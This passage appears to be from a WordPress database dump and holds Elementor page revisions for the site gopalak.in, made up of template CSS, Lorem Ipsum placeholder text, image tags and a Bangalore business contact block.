src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:18:53','2022-09-30 06:48:53','',1373,'https://gopalak.in/?p=1499',0,'revision','',0),(1501,1,'2022-09-30 12:26:09','2022-09-30 06:56:09','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:26:09','2022-09-30 06:56:09','',1373,'https://gopalak.in/?p=1501',0,'revision','',0),(1502,1,'2022-09-30 12:26:09','2022-09-30 06:56:09','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, 